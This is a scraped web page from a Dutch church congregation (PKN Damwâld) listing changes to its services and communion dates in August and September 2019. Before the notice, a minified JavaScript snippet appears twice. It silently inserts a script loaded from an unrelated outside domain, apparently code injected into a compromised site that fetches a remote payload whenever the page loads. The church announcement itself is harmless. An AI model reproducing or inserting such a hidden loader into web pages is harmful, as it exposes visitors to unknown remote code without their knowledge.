;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dienstwijzigingen Hervormd Akkerwoude c.a. - PKN Damwâld

Dienstwijzigingen Hervormd Akkerwoude c.a.

Gepubliceerd op: zaterdag 17 augustus 2019

Vanwege allerlei vakantieperikelen zijn er ten opzichte van de publicatie in de Paadwizer enkele wijzigingen ontstaan:

  • Voorganger in de gezamenlijke middagdienst in de Bonifatiuskerk op 25 augustus 2019, 14.00 uur,  is dhr. W. Feddema (Driesum);
  • De ochtenddienst (voorbereiding Heilig Avondmaal) op 1 september is verplaatst naar de Bonifatiuskerk. Dhr. J.Y. v.d. Wal (Morra) gaat in die dienst voor;
  • Op 8 september vieren wij o.l.v. ds. Otter ’s morgens in De Ikker het Heilig Avondmaal;
  • De (korte-) viering van het Heilig Avondmaal in Nij Tjaerda zal wel op 1 september om 16.00 uur worden gehouden.

Het kerkdienstenoverzicht van deze deze website alsook de berichtgeving in de diverse kranten zijn inmiddels bijgewerkt en zijn dus eveneens ook juist. Meer informatie ? Bel de scriba.